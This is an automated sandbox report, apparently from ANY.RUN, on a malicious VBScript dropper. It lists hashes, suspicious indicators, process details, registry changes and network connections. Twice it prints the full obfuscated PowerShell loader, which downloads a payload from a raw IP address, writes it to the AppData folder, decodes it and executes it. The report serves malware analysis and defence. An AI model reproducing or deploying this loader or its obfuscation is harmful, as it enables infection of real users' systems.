File name: 733012c16a8f4e25dce16574f12365eb8616c62313da5f97241599c5864f0c50.vbs

Full analysis: https://app.any.run/tasks/12bb816b-0e5f-4c22-8ddc-f065f5dc78bd
Verdict: Malicious activity
Analysis date: May 14, 2024, 06:10:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 3443D85844AC2D8B4A8E85C02C548B42
SHA1: 554437C5ED38FF1C09D40DACEC3F0B9CCD0B82D4
SHA256: 733012C16A8F4E25DCE16574F12365EB8616C62313DA5F97241599C5864F0C50
SSDEEP: 6144:7syS5Hz0L9jTGquGSqCG2NPnbY/0M7xxMldTSsp3vraSEPW/snrOLNC51gdQl7VJ:nCRT+WPxm3pfqiMwc/MVqAd+2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6196)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
    • Connects to the server without a host name

      • powershell.exe (PID: 6232)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 6232)
    • Unusual connection from system programs

      • powershell.exe (PID: 6232)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 6160)
  • INFO

    • Reads the software policy settings

      • slui.exe (PID: 7128)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)
    • Checks proxy server information

      • powershell.exe (PID: 6232)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 134
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Process nodes in the graph, in order, keeping the graph's own "no specs" labels: wscript.exe (no specs), sppextcomobj.exe (no specs), slui.exe, slui.exe (no specs), filecoauth.exe (no specs), powershell.exe, conhost.exe (no specs), cmd.exe (no specs), powershell.exe (no specs), cmd.exe (no specs)

Process information

PID: 1684
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 3528
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll

PID: 4484
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ankomstrkkeflger234.Unp && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll

PID: 5092
CMD: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -Embedding
Path: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft OneDrive File Co-Authoring Executable
Exit code: 0
Version: 19.043.0304.0013
Modules (images): c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\user32.dll, c:\windows\syswow64\win32u.dll

6160"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antiatommarchens183 = 1;$Ridsenaales='Su';$Ridsenaales+='bstrin';$Ridsenaales+='g';Function Unaccommodatingness($swamped){$Mortgages=$swamped.Length-$Antiatommarchens183;For($Indicolite=2;$Indicolite -lt $Mortgages;$Indicolite+=3){$Stiftelsesoverenskomsten+=$swamped.$Ridsenaales.Invoke( $Indicolite, $Antiatommarchens183);}$Stiftelsesoverenskomsten;}function dihalogen($Chasteweed){. ($Roegtes) ($Chasteweed);}$Bearbejdelige=Unaccommodatingness ' MF,oSez.xiSnlPal.oa l/Va5 a. ,0.r Gl(,uW niIrnR.d SoDawAfs,o TrNCiTNa af1Hy0.e.Te0 n;.e ,WKoiT npe6C.4Vi;Te Trxlu6 S4 t;C. H,rHevPr:U 1Vr2Te1Fl.Sy0By) . TGAne .c Ck Fo,a/T 2 T0 ,1Al0Du0 o1,l0,u1Re BaFNjiRar keMaf ,oEkxTo/ E1Xa2 ,1Bl. H0F. ';$Dreas=Unaccommodatingness ' UStsReeObr.e-FrAR gsne mnubt ';$Sdsuppens=Unaccommodatingness 'MohP,t kt apB :Ar/ B/ .1T 7G,8La.To2 B1Wo5Ve.Do2An3Pi6Ed.U,2 C2,e9.r/D,WUno SrTwdPssAnt HaA.rEmsTi.S c,esBnvCa ';$sknsforretning=Unaccommodatingness 'A.>P. ';$Roegtes=Unaccommodatingness ' LiV.ePoxPr ';$Ignitions='Oilhole';dihalogen (Unaccommodatingness 'ViSBre etEy- oC lo SnUrt .ehinSut y Me-PsPHuaAdtEnhC, HTSa: Y\KaSF,h lr.aiPse,akL.iV.l .yGr.Emt PxA.t h o-TiVSuaR lAnuSyeWe Ny$,iIBrg InOmiPstCoi.to ,n msug;,y ');dihalogen (Unaccommodatingness 'OviLif B Ch(PatNoeXesS t .-.ep na,etSohAl GaT.r: a\CoS.lhSyrHeifje.ok.oi SlP,y t. AtN.xBotAa)Sk{Ufe ,xUdi.at d},i; . ');$Rivieraens = Unaccommodatingness 'C.eThcArhI.oW, S% ha up.ap,rdAfa .t aaMi%S,\SeAStnAlk Fo ,mFis ,tsqrHgkQukCoe IfTnl,rgAreDerTu2,r3s,4Re.H.US n .p U T,& ,&Lo maeAlcBehCeo B ke$ , ';dihalogen (Unaccommodatingness ' .$ g,el.loS,bR aChlKl:NaUC.dItvAba GnSydT.rS eGlnBudphe Us.o=Al(.gcAsm,id.u In/Spc,h Kl$SaRNoiS vkaiToeLurdaaboeKlnvasP.) . 
');dihalogen (Unaccommodatingness 'Te$DigLal oombala SlHo:AcM saHjl.olPhoVas ,eO,iSusSpmRoi LcTa=Be$.eSM dubsTuuVipChpPreopn gsUr.SesOdp HlJeiret ,(Ad$ FsBikWanO,s.ufslo or Urdae ct Tn PiU,nRugDe)In ');$Sdsuppens=$Malloseismic[0];dihalogen (Unaccommodatingness ' S$nagT,l SoPibUnaG.lO.:T,VWreP r Bt tiStkGra li,sI.= .N BeU,w.y-CaOEqb.oj ,ea.cSit T .SAvyBeslatSkeLumBe. .NS eDet A.ArWF e,eb.eCBilmiiHve CnP,tN ');dihalogen (Unaccommodatingness ' P$AaVTseGurF.t DidekBoaMil,lsAn. BH .e ra ,dPeeT rCisEa[ P$I,D dr .eC.aFisS ]Kr=Pr$F B He,ra DrC.bS e jS,dMieSalL.iF,g.ae P ');$Ublufrdigst=Unaccommodatingness 'D,VGee,ar AtN istka aY l Ks r.InD ToBow on ul aoVua.edEcF aiKrl.oepr(Do$c,S,ld Es u SpKlpGre .nInsRu, J$PrAFon.ug Ur .eFrbPas,oschpF,iColPalPreBatko) ';$Ublufrdigst=$Udvandrendes[1]+$Ublufrdigst;$Angrebsspillet=$Udvandrendes[0];dihalogen (Unaccommodatingness '.v$I.gExlK,oFsbCaaKol N:EpD Ti oaHal,toKog afSeoIlr,smPhe.oneas J=Af( FTTreHesTrtMu-GePMiaFltA,hin A$ ASknPlgtrrOveBab DsFosGlpAsiU,lDilTie ItWa)Na ');while (!$Dialogformens) {dihalogen (Unaccommodatingness ' N$A.gPul AoI bO.a.al o:BuQBauTviSezS,esitFdsa = .$CatUfrT uSpeAr ') ;dihalogen $Ublufrdigst;dihalogen (Unaccommodatingness ',iSFitBea.tr AtVa-TrSE lFae Te.ypVa T,4Pe ');dihalogen (Unaccommodatingness 'A,$Ilgf,linoshbC.aknlm,: KDPoiBlaGrl ,o gM,fH oEgr OmUne FnB.s p=.t(OeTKee esGrt,p- NP paStt,ihSe Ab$CaA.pn PgGarSceWebGesDesHup istl.ml OeS.tCo)K. 
') ;dihalogen (Unaccommodatingness 'Ty$Fog al oo,cbA aFylJa:,iV .oUnkl s.ne .sBatDeeD.d oe atTa=.i$ SgEbl RofobWiaEnlPa:NyTHou OsSpiTunF.dTreSudAbe olFr1Fa8Pi0Se+Go+An%Or$HaMDoat,l Nl.eo Us,peskiK s Pm SiF,cD..OzcAmoPruDen It.n ') ;$Sdsuppens=$Malloseismic[$Voksestedet];}$Sunlet=317389;$Teutonomania=27077;dihalogen (Unaccommodatingness 'Re$Degufl SoPab iaT,lLo:P.PDaoBelH.y TpFahS.owinTeeFyd a s= M TaGAkeS.tGy-idCAboDen.ot .e bn Rt.r Tr$ SA on Cg .rP,estb Rs.lsH p Fi Clcol GeCot.e ');dihalogen (Unaccommodatingness '.a$spgBjlLioUpbP.a .lVe:OoD .uPrpMal ,iV,kHyeOurSkiMinS.g.eeFrrN. T=Oo Jr[L.S py sFltMaeS.m O.SrC So .n .v.ueE.r rtKa] t:am:KlFBerSco FmUnBOua ,s,neF 6Tr4HoSSytb rSaiFon.tg K(Fr$ .PMoo.ol.ayTypReh BoChnafeH.dRd)Es ');dihalogen (Unaccommodatingness 'Ba$C.gKhlU.oKib AaFolAn:S.WT.ilrvTiiLaa AnD ud=H. [WaSAxyHes t PeQ mQu.,aTDaeD,x,rtKv.SiE inSvcKno od ,iE.n Og ,].i:Im:AnAUbS,dCT ICoI ,.KiGBle.rtOpSsktForEfiLonKngGo(A.$ TDZ.u op Rl ui,okA,ePerDeiHen.hg,ne.irMu)fl ');dihalogen (Unaccommodatingness 'Ha$P,gS.l.oo obTea Elhd:.vMEko LoSdr SiP.n ,g lsV,= A$C WSyiSuv LiCya .nSt. .s FuVab s,ntMer Ci,onCigOr(Un$ rSTeuOcnInlGre tC.,Do$ToTAdeL u At Soc.nOmoExmBlaG.nA.ibaaCo) , ');dihalogen $Moorings;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\msvcrt.dll, c:\windows\syswow64\oleaut32.dll

PID: 6196
CMD: "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\733012c16a8f4e25dce16574f12365eb8616c62313da5f97241599c5864f0c50.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Modules (images): c:\windows\system32\wscript.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

6232"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Antiatommarchens183 = 1;$Ridsenaales='Su';$Ridsenaales+='bstrin';$Ridsenaales+='g';Function Unaccommodatingness($swamped){$Mortgages=$swamped.Length-$Antiatommarchens183;For($Indicolite=2;$Indicolite -lt $Mortgages;$Indicolite+=3){$Stiftelsesoverenskomsten+=$swamped.$Ridsenaales.Invoke( $Indicolite, $Antiatommarchens183);}$Stiftelsesoverenskomsten;}function dihalogen($Chasteweed){. ($Roegtes) ($Chasteweed);}$Bearbejdelige=Unaccommodatingness ' MF,oSez.xiSnlPal.oa l/Va5 a. ,0.r Gl(,uW niIrnR.d SoDawAfs,o TrNCiTNa af1Hy0.e.Te0 n;.e ,WKoiT npe6C.4Vi;Te Trxlu6 S4 t;C. H,rHevPr:U 1Vr2Te1Fl.Sy0By) . TGAne .c Ck Fo,a/T 2 T0 ,1Al0Du0 o1,l0,u1Re BaFNjiRar keMaf ,oEkxTo/ E1Xa2 ,1Bl. H0F. ';$Dreas=Unaccommodatingness ' UStsReeObr.e-FrAR gsne mnubt ';$Sdsuppens=Unaccommodatingness 'MohP,t kt apB :Ar/ B/ .1T 7G,8La.To2 B1Wo5Ve.Do2An3Pi6Ed.U,2 C2,e9.r/D,WUno SrTwdPssAnt HaA.rEmsTi.S c,esBnvCa ';$sknsforretning=Unaccommodatingness 'A.>P. ';$Roegtes=Unaccommodatingness ' LiV.ePoxPr ';$Ignitions='Oilhole';dihalogen (Unaccommodatingness 'ViSBre etEy- oC lo SnUrt .ehinSut y Me-PsPHuaAdtEnhC, HTSa: Y\KaSF,h lr.aiPse,akL.iV.l .yGr.Emt PxA.t h o-TiVSuaR lAnuSyeWe Ny$,iIBrg InOmiPstCoi.to ,n msug;,y ');dihalogen (Unaccommodatingness 'OviLif B Ch(PatNoeXesS t .-.ep na,etSohAl GaT.r: a\CoS.lhSyrHeifje.ok.oi SlP,y t. AtN.xBotAa)Sk{Ufe ,xUdi.at d},i; . ');$Rivieraens = Unaccommodatingness 'C.eThcArhI.oW, S% ha up.ap,rdAfa .t aaMi%S,\SeAStnAlk Fo ,mFis ,tsqrHgkQukCoe IfTnl,rgAreDerTu2,r3s,4Re.H.US n .p U T,& ,&Lo maeAlcBehCeo B ke$ , ';dihalogen (Unaccommodatingness ' .$ g,el.loS,bR aChlKl:NaUC.dItvAba GnSydT.rS eGlnBudphe Us.o=Al(.gcAsm,id.u In/Spc,h Kl$SaRNoiS vkaiToeLurdaaboeKlnvasP.) . 
');dihalogen (Unaccommodatingness 'Te$DigLal oombala SlHo:AcM saHjl.olPhoVas ,eO,iSusSpmRoi LcTa=Be$.eSM dubsTuuVipChpPreopn gsUr.SesOdp HlJeiret ,(Ad$ FsBikWanO,s.ufslo or Urdae ct Tn PiU,nRugDe)In ');$Sdsuppens=$Malloseismic[0];dihalogen (Unaccommodatingness ' S$nagT,l SoPibUnaG.lO.:T,VWreP r Bt tiStkGra li,sI.= .N BeU,w.y-CaOEqb.oj ,ea.cSit T .SAvyBeslatSkeLumBe. .NS eDet A.ArWF e,eb.eCBilmiiHve CnP,tN ');dihalogen (Unaccommodatingness ' P$AaVTseGurF.t DidekBoaMil,lsAn. BH .e ra ,dPeeT rCisEa[ P$I,D dr .eC.aFisS ]Kr=Pr$F B He,ra DrC.bS e jS,dMieSalL.iF,g.ae P ');$Ublufrdigst=Unaccommodatingness 'D,VGee,ar AtN istka aY l Ks r.InD ToBow on ul aoVua.edEcF aiKrl.oepr(Do$c,S,ld Es u SpKlpGre .nInsRu, J$PrAFon.ug Ur .eFrbPas,oschpF,iColPalPreBatko) ';$Ublufrdigst=$Udvandrendes[1]+$Ublufrdigst;$Angrebsspillet=$Udvandrendes[0];dihalogen (Unaccommodatingness '.v$I.gExlK,oFsbCaaKol N:EpD Ti oaHal,toKog afSeoIlr,smPhe.oneas J=Af( FTTreHesTrtMu-GePMiaFltA,hin A$ ASknPlgtrrOveBab DsFosGlpAsiU,lDilTie ItWa)Na ');while (!$Dialogformens) {dihalogen (Unaccommodatingness ' N$A.gPul AoI bO.a.al o:BuQBauTviSezS,esitFdsa = .$CatUfrT uSpeAr ') ;dihalogen $Ublufrdigst;dihalogen (Unaccommodatingness ',iSFitBea.tr AtVa-TrSE lFae Te.ypVa T,4Pe ');dihalogen (Unaccommodatingness 'A,$Ilgf,linoshbC.aknlm,: KDPoiBlaGrl ,o gM,fH oEgr OmUne FnB.s p=.t(OeTKee esGrt,p- NP paStt,ihSe Ab$CaA.pn PgGarSceWebGesDesHup istl.ml OeS.tCo)K. 
') ;dihalogen (Unaccommodatingness 'Ty$Fog al oo,cbA aFylJa:,iV .oUnkl s.ne .sBatDeeD.d oe atTa=.i$ SgEbl RofobWiaEnlPa:NyTHou OsSpiTunF.dTreSudAbe olFr1Fa8Pi0Se+Go+An%Or$HaMDoat,l Nl.eo Us,peskiK s Pm SiF,cD..OzcAmoPruDen It.n ') ;$Sdsuppens=$Malloseismic[$Voksestedet];}$Sunlet=317389;$Teutonomania=27077;dihalogen (Unaccommodatingness 'Re$Degufl SoPab iaT,lLo:P.PDaoBelH.y TpFahS.owinTeeFyd a s= M TaGAkeS.tGy-idCAboDen.ot .e bn Rt.r Tr$ SA on Cg .rP,estb Rs.lsH p Fi Clcol GeCot.e ');dihalogen (Unaccommodatingness '.a$spgBjlLioUpbP.a .lVe:OoD .uPrpMal ,iV,kHyeOurSkiMinS.g.eeFrrN. T=Oo Jr[L.S py sFltMaeS.m O.SrC So .n .v.ueE.r rtKa] t:am:KlFBerSco FmUnBOua ,s,neF 6Tr4HoSSytb rSaiFon.tg K(Fr$ .PMoo.ol.ayTypReh BoChnafeH.dRd)Es ');dihalogen (Unaccommodatingness 'Ba$C.gKhlU.oKib AaFolAn:S.WT.ilrvTiiLaa AnD ud=H. [WaSAxyHes t PeQ mQu.,aTDaeD,x,rtKv.SiE inSvcKno od ,iE.n Og ,].i:Im:AnAUbS,dCT ICoI ,.KiGBle.rtOpSsktForEfiLonKngGo(A.$ TDZ.u op Rl ui,okA,ePerDeiHen.hg,ne.irMu)fl ');dihalogen (Unaccommodatingness 'Ha$P,gS.l.oo obTea Elhd:.vMEko LoSdr SiP.n ,g lsV,= A$C WSyiSuv LiCya .nSt. .s FuVab s,ntMer Ci,onCigOr(Un$ rSTeuOcnInlGre tC.,Do$ToTAdeL u At Soc.nOmoExmBlaG.nA.ibaaCo) , ');dihalogen $Moorings;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 6816
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ankomstrkkeflger234.Unp && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images): c:\windows\syswow64\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\msvcrt.dll, c:\windows\syswow64\combase.dll

PID: 7096
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\sppextcomobj.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\oleaut32.dll

PID: 7128
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll

Total events: 15 624
Read events: 15 601
Write events: 23
Delete events: 0

Modification events

(PID) Process: (3528) slui.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation: write
Name: @%SystemRoot%\System32\sppcomapi.dll,-3200
Value: Software Licensing

(PID) Process: (6196) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (6196) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (6196) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (6196) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (6232) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (6232) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (6232) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (6232) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (6232) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

Executable files: 0
Suspicious files: 2
Text files: 5
Unknown types: 0

Dropped files

PID | Process | Filename | Type
5092 | FileCoAuth.exe | C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-05-14.0612.5092.1.aodl | binary
MD5:28DCA2FF4B34B5A52A2E59DF202A6ED3
SHA256:33BACCB7296F1ED1F995FC77A23049F261CF391AC0388F9E8DD161F8C17B7F94
6232 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_de0c1mlt.hyy.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092 | FileCoAuth.exe | C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-05-14.0612.5092.1.odl | binary
MD5:231AD7C7AF77903A2554300F76653B67
SHA256:14EA19006D48F1ED8E3484288F1172FDB28CA3986BEBDD92B5B72F31415120FC
6232 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cs1kbiun.b14.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6160 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2bownn0e.3ga.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6160 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrwresrr.dry.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6232 | powershell.exe | C:\Users\admin\AppData\Roaming\Ankomstrkkeflger234.Unp | text
MD5:D6EE805F62D87E0D248143752679F5AD
SHA256:7E415B8ABC4C21CF4B8A3E24F3B09AFD50866B79E566D5D51C0AD5FE7D04A89E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 45
DNS requests: 16
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5548 | svchost.exe | GET | 200 | 23.37.9.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
5260 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | unknown
5548 | svchost.exe | GET | 200 | 23.216.155.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
6352 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | unknown
4024 | SIHClient.exe | GET | 200 | 23.37.9.217:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | unknown
4024 | SIHClient.exe | GET | 200 | 23.37.9.217:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | unknown
6232 | powershell.exe | GET | 200 | 178.215.236.229:80 | http://178.215.236.229/Wordstars.csv | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4364 | svchost.exe | 239.255.255.250:1900 | unknown
4 | System | 192.168.100.255:138 | unknown
5548 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5380 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5140 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5548 | svchost.exe | 23.216.155.114:80 | crl.microsoft.com | Akamai International B.V. | IE | unknown
5548 | svchost.exe | 23.37.9.217:80 | www.microsoft.com | AKAMAI-AS | PH | unknown
5260 | svchost.exe | 20.190.160.17:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5260 | svchost.exe | 192.229.221.95:80 | EDGECAST | US | whitelisted
